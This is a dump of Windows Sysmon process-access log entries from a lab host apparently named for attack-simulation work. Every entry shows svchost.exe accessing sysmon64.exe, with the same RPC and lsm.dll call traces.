12:01:01.612{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001810Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.612{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001809Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.612{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001808Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.612{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001807Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.612{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001806Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.612{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001805Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.612{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001804Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.612{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001803Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.612{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001802Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.612{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001801Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.612{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001800Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.612{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001799Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.612{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001798Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.612{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001797Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.612{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001796Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.612{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001795Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.612{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001794Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.612{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001793Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.598{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001792Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.598{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001791Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.598{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001790Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.598{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001789Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.598{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001788Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.598{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001787Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 